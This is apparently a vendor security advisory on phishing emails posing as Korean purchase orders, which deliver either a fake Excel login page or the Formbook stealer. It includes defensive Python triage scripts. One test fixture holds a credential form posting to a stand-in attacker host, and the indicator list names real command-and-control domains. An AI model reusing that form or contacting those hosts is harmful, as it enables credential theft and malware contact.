Received Estimate/Purchase Order Email? Take Caution When Opening Them!

As companies resumed business with the start of 2021, a wave of malicious emails disguised as ordinary business correspondence has been discovered, so users must remain vigilant when opening email. The attacks observed use messages with business-related subjects, such as 'estimate request' or 'purchase order,' carrying malicious attachments. Opening the attachment either directs the user to a phishing site that asks for account credentials or infects the PC with information-stealing malware.

In January and February of this year, ASEC identified numerous emails disguised as 'estimate requests' or 'purchase orders' that attempt to steal user information. The emails were written in fluent Korean and included the phrase 'Please check the attached file.' (in Korean) to prompt the recipient to open the attachment. The attacker also impersonated a specific employee and reused that person's email signature to avoid suspicion. Two of the discovered cases are described below.

1. Malicious Email Disguised as Estimate Request

In January of this year, a malicious email with the subject 'Estimate Request' was discovered. The body, in Korean, read 'Please refer to the purchase order attached for product delivery.' Two malicious HTML files were attached: 'Purchase order.html' and 'Request for PO.html.'

Opening either HTML attachment directs the user to a phishing site designed to look like an Excel spreadsheet, as shown in the figure below. If the user is deceived by the fake Excel page and enters an email address and password, the credentials are sent to the attacker immediately. Because the attachment is simply a web page rendered by the browser, the attack does not depend on any Office vulnerability or macro; the only thing it needs is the user typing into the form.

[Figure] Phishing site disguised as an Excel file
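The core of the HTML lure above is a login form that posts the victim's mailbox credentials to a server the attacker controls. The following Python script is an added example (not ASEC's code) of how a mail gateway or analyst can statically triage such an attachment: it parses the HTML, flags any password form whose action points outside the claimed sender's domain (or has no absolute action at all, which usually means JavaScript does the exfiltration), notes a page title that imitates a document name, and looks for decoding primitives that hide the real page in an encoded string. The sample page, the sender domain example.com and the host attacker.example are constructed for illustration and are not indicators from the post.

```python
"""Static triage of an HTML e-mail attachment for credential-phishing traits.

Added example for this post, not ASEC's code. The sample page below is
constructed to resemble the 'Purchase order.html' lure described above;
attacker.example and example.com are placeholders, not real indicators.
"""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

SAMPLE_HTML = """
<html><head><title>Purchase order.xlsx</title></head>
<body>
<img src="sheet.png" alt="spreadsheet preview">
<p>Sign in with your e-mail account to view the document.</p>
<form method="POST" action="https://attacker.example/collect.php">
  <input type="email" name="user">
  <input type="password" name="pass">
  <button type="submit">Open</button>
</form>
</body></html>
"""


class _FormCollector(HTMLParser):
    """Collect every <form>, whether it asks for a password, and the page title."""

    def __init__(self):
        super().__init__()
        self.forms = []          # [{"action": str, "has_password": bool}, ...]
        self.title = ""
        self._form = None
        self._in_title = False

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self._form = {"action": a.get("action") or "", "has_password": False}
            self.forms.append(self._form)
        elif tag == "input" and self._form is not None:
            if (a.get("type") or "").lower() == "password":
                self._form["has_password"] = True
        elif tag == "title":
            self._in_title = True

    def handle_endtag(self, tag):
        if tag == "form":
            self._form = None
        elif tag == "title":
            self._in_title = False

    def handle_data(self, data):
        if self._in_title:
            self.title += data


def _same_org(host, domain):
    # Exact match or a proper subdomain; avoids "notexample.com" matching "example.com".
    return host == domain or host.endswith("." + domain)


def triage_html(html, sender_domain):
    """Return a list of findings (empty means no phishing trait was found).

    sender_domain is the domain of the claimed sender; a password form that
    posts anywhere else is the core signal for this kind of lure.
    """
    p = _FormCollector()
    p.feed(html)
    findings = []
    for f in p.forms:
        if not f["has_password"]:
            continue
        host = (urlparse(f["action"]).hostname or "").lower()
        if not host:
            findings.append("password form with no absolute action (likely JavaScript-driven exfiltration)")
        elif not _same_org(host, sender_domain):
            findings.append(f"password form posts to external host {host}")
    # A local HTML file whose title ends in .xlsx/.docx/.pdf is pretending to be a document.
    if re.search(r"\.(xlsx?|docx?|pdf)\b", p.title, re.I):
        findings.append(f"title imitates a document name: {p.title.strip()!r}")
    # atob/unescape/eval are how lures hide the real form behind an encoded blob.
    if re.search(r"\b(atob|unescape|eval)\s*\(", html):
        findings.append("decoding/eval primitives present; the real page may be hidden in an encoded string")
    return findings


if __name__ == "__main__":
    for finding in triage_html(SAMPLE_HTML, "example.com"):
        print("-", finding)
```

The sender-domain comparison is the important design choice: a legitimate document portal would post credentials to the organization that sent the file, while these lures post to an unrelated host, so the script treats that mismatch as the primary signal rather than relying on a blocklist of known phishing hosts.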

2. Malicious E-mail Disguised as a Purchase Order/Estimate

In February of this year, malicious emails with the subjects 'Regarding Specifications and Estimate Request' and 'Regarding the Purchase Orders on Exports to China' were discovered one after another. Both used fluent Korean and detailed email signatures to avoid suspicion.

When the user downloads the attached archive, extracts it, and runs the executable (.exe) inside, the PC is infected with malware. The detection names below identify it as Formbook, an information stealer; infection can result in the theft of keystrokes and of account credentials saved in the web browser.
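Because this lure delivers the executable inside an archive, a mail gateway or triage script can catch it before the user ever extracts it. The following Python script is an added example (not AhnLab's code) of that check: it opens a zip attachment in memory, flags executable extensions and double extensions such as .pdf.exe, reads the first bytes of each entry to catch a renamed PE file, and reports password-protected entries it cannot inspect, since attackers use encryption precisely to defeat gateway scanning. The archive, the file names and the MZ header stubs are constructed for illustration and contain no real malware.

```python
"""Gateway-style inspection of an archive attachment for executable payloads.

Added example for this post, not AhnLab's code. The archive is constructed
here in memory: the 'executable' entries are inert 64-byte DOS header stubs,
not real malware, and the file names are made up.
"""
import io
import zipfile

EXEC_EXTENSIONS = {".exe", ".scr", ".com", ".pif", ".bat", ".cmd",
                   ".js", ".jse", ".vbs", ".vbe", ".wsf", ".hta", ".dll"}
PE_MAGIC = b"MZ"


def _pe_stub():
    # DOS header 'MZ' followed by padding; enough to trip a magic-byte check.
    return PE_MAGIC + b"\x00" * 62


def build_sample_archive():
    """Constructed sample resembling the lure: document-looking names hide a PE."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("Estimate_Request_2021.pdf.exe", _pe_stub())   # double extension
        z.writestr("Purchase_Order.pdf", _pe_stub())              # renamed executable
        z.writestr("readme.txt", "Please see the attached estimate.")
    return buf.getvalue()


def inspect_archive(data):
    """Return findings for every entry that looks executable; [] means clean."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(data)) as z:
        for info in z.infolist():
            name = info.filename
            if info.is_dir():
                continue
            lower = name.lower()
            ext = "." + lower.rsplit(".", 1)[1] if "." in lower else ""
            if ext in EXEC_EXTENSIONS:
                findings.append(f"{name}: executable extension {ext}")
                if lower.count(".") >= 2:
                    findings.append(f"{name}: double extension disguising an executable as a document")
            # Bit 0 of the general-purpose flags marks an encrypted entry. It cannot be
            # read without the password, and attackers rely on that to evade scanning.
            if info.flag_bits & 0x1:
                findings.append(f"{name}: encrypted entry, content not inspectable")
                continue
            # Magic-byte check catches a renamed binary that the extension check misses.
            with z.open(info) as fh:
                head = fh.read(2)
            if head == PE_MAGIC and ext not in EXEC_EXTENSIONS:
                findings.append(f"{name}: PE header (MZ) under a non-executable name")
    return findings


if __name__ == "__main__":
    for finding in inspect_archive(build_sample_archive()):
        print("-", finding)
```

Extension and magic-byte checks are deliberately both present: the first catches the common .pdf.exe trick even when the file is truncated, while the second catches a binary that has been renamed to a harmless-looking extension and relies on the user renaming it back or on a launcher script.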

AhnLab's V3 products currently block both the malware and the phishing site described above.

To reduce the damage from such malware, users should: ▲Refrain from running executable files or URLs attached to emails from unknown senders, ▲Apply the latest security patches for the OS, web browsers (IE, Chrome, Firefox, etc.), and programs such as Office software, ▲Keep anti-malware software updated to the latest version at all times and enable real-time scanning.

Hayoung Yang, team manager of the Analysis team at AhnLab, stated that “employees who handle related business often receive emails similar to these, making them vulnerable to such malware if they do not remain vigilant enough. Leaked account information and user info can be used for targeted attacks in the next round. Therefore, it is important to take extra caution and check the sender of the email along with the attachment file, and make sure not to run any attachments or URLs from unknown sources.”

AhnLab’s anti-malware solution V3 Lite detects and blocks this malware using the aliases below.

[File Detection]

Malware/Win32.RL_Generic.C4310220

[Memory Detection]

Trojan/Win.Formbook.XM52

[Behavior Detection]

Malware/MDP.Injection.M3509

[IOC Info]

  • MD5 : 85f52fdf0f7ef9b3deb19fa2daef41df
  • hxxp://www.searko.com/gtl/ (Real C2)
  • hxxp://www.9dgevjb.net/gtl/ (Fake C2)
  • hxxp://www.ndjamua.com/gtl/ (Fake C2)
  • hxxp://www.rnshaircare.com/gtl/ (Fake C2)
  • hxxp://melhoresradios.com/gtl/ (Fake C2)
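The IOC list above is notable for its shape: five different domains, one real C2 and four fakes, all contacted on the same /gtl/ path. Matching the listed hosts exactly is the obvious first sweep, but the more durable detection is behavioural, since the next sample will use different domains. The following Python script is an added example (not AhnLab's code) that does both over proxy logs: an exact-match sweep against the published hosts (defanged hxxp restored to plain host names) and a fan-out heuristic that alerts when one client reaches the same non-root path on several unrelated domains within a short window. The log lines are constructed for illustration, and the fan-out heuristic is the editor's own, not something the post describes.

```python
"""Hunt proxy logs for the C2 traffic pattern behind this post's IOCs.

Added example, not AhnLab's code. The host list is copied from the IOC
section above (defanged hxxp restored to plain host names). The log lines are
constructed for illustration, and the fan-out heuristic is the editor's own:
the post labels one of the five /gtl/ hosts as the real C2 and four as fakes,
so one client reaching the same unusual path on several unrelated domains is
the behaviour worth alerting on even when the domains themselves are new.
"""
import re
from collections import defaultdict
from urllib.parse import urlparse

KNOWN_C2_HOSTS = {
    "www.searko.com",        # real C2 per the post
    "www.9dgevjb.net",       # fake C2
    "www.ndjamua.com",       # fake C2
    "www.rnshaircare.com",   # fake C2
    "melhoresradios.com",    # fake C2
}

# Constructed sample (fields: epoch-ts client method url status); not from the post.
SAMPLE_LOG = """\
1612345600.101 10.0.0.12 GET http://www.9dgevjb.net/gtl/?a=1 200
1612345601.004 10.0.0.12 POST http://www.searko.com/gtl/ 200
1612345601.880 10.0.0.12 GET http://www.ndjamua.com/gtl/?a=2 404
1612345602.340 10.0.0.12 GET http://melhoresradios.com/gtl/?a=3 200
1612345603.000 10.0.0.12 GET http://www.rnshaircare.com/gtl/?a=4 503
1612345610.000 10.0.0.20 GET http://www.example.com/news/ 200
1612345611.000 10.0.0.20 GET http://cdn.example.net/news/ 200
"""

LINE_RE = re.compile(
    r"^(?P<ts>\d+\.\d+) (?P<client>\S+) (?P<method>\S+) (?P<url>\S+) (?P<status>\d+)$"
)


def parse_log(text):
    """Yield one dict per well-formed line; malformed lines are skipped."""
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:
            yield m.groupdict()


def find_ioc_hits(text):
    """Exact-match sweep against the published host list."""
    return [r for r in parse_log(text)
            if (urlparse(r["url"]).hostname or "") in KNOWN_C2_HOSTS]


def find_path_fanout(text, min_hosts=3, window=60.0):
    """Behavioural sweep: one client, one path, >= min_hosts distinct domains
    within `window` seconds. Ignores '/' since many unrelated sites share it."""
    events = defaultdict(list)   # (client, path) -> [(ts, host), ...]
    for r in parse_log(text):
        u = urlparse(r["url"])
        if u.path in ("", "/"):
            continue
        events[(r["client"], u.path)].append((float(r["ts"]), u.hostname))
    alerts = []
    for (client, path), seq in events.items():
        seq.sort()
        for i, (t0, _) in enumerate(seq):
            hosts = {h for t, h in seq[i:] if t - t0 <= window}
            if len(hosts) >= min_hosts:
                alerts.append({"client": client, "path": path, "hosts": sorted(hosts)})
                break
    return alerts


if __name__ == "__main__":
    print("IOC hits:", len(find_ioc_hits(SAMPLE_LOG)))
    for a in find_path_fanout(SAMPLE_LOG):
        print(f"{a['client']} hit {a['path']} on {len(a['hosts'])} hosts: {a['hosts']}")
```

The fan-out rule is deliberately tuned with a minimum host count and a time window rather than a fixed path string: the decoy domains exist to drown the real C2 in noise, so the distinguishing feature is the burst of identical paths across unrelated hosts, and the status codes (the fakes commonly answer 404 or 503 while the real C2 answers 200) are worth keeping in the alert for the analyst.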

Categories: Malware Information
